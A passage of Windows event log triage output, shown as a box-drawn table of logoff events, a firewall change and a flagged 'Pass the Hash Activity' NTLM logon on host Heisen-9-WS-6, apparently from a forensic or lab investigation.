72;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-20 17:38:51 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 3843      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: DWM-2            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 2                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-90-0-2      &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: Window Manag   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; er                               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x3da14'         &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-24 22:44:27 &#9474; &#8227; Windows Firewall Settings         &#9474; 1     &#9474; Microsoft-Windows-Windows Fire &#9474; 2002     &#9474; 1534      &#9474; Heisen-9-WS-6   &#9474; ModifyingUser: S-1-5-80-308807   &#9474;
&#9474;                     &#9474; Have Been Changed                   &#9474;       &#9474; wall With Advanced Security    &#9474;          &#9474;           &#9474;                 &#9474; 3201-1464728630-1879813800-110   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 7566885-823218052                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SettingValue: '06000000'         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SettingType: 2                   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SettingValueSize: 4              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SettingValueDisplay: Private,P   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ublic                            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; Origin: 1                        &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ModifyingApplication: ''         &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-24 22:50:57 &#9474; &#8227; Pass the Hash Activity            &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4624     &#9474; 4261      &#9474; Heisen-9-WS-6   &#9474; AuthenticationPackageName: NTL   &#9474;
&#9474;                     &#9474; 2                                   &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; M                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; LogonProcessName: NtLmSsp        &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetOutboundDomainName: '-'    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLinkedLogonId: '0x0'       &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; LmPackageName: NTLM V2           &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectUserName: '-'             &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-1002   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; IpAddress: 10.129.242.110        &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; KeyLength: 0                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectLogonId: '0x0'            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x430b3c'        &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ElevatedToken: '%%1842'          &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; LogonGuid: 00000000-0000-0000-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 0000-000000000000                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; RestrictedAdminMode: '-'         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectDomainName: '-'           &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; VirtualAccount: '%%1843'         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetOutboundUserName: '-'      &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; WorkstationName: '-'             &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; IpPort: '48952'                  &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ImpersonationLevel: '%%1833'     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectUserSid: S-1-0-0          &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TransmittedServices: '-'         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ProcessId: '0x0'                 &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserName: Werni            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ProcessName: '-'                 &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-24 22:52:58 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 4307      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: Werni            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-1002   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x430e91'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-24 22:54:58 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 4337      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: Werni            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-1002   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x4f4e53'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-24 22:56:58 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 4346      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: Werni            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-1002   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x5c8676'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-24 22:58:58 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 4349      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: Werni            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-1002   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x696bfc'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-24 23:00:24 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 4419      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: Werni            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-1002   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x430b3c'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-24 23:00:24 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 4420      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: Werni            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-1002   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x6d626d'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&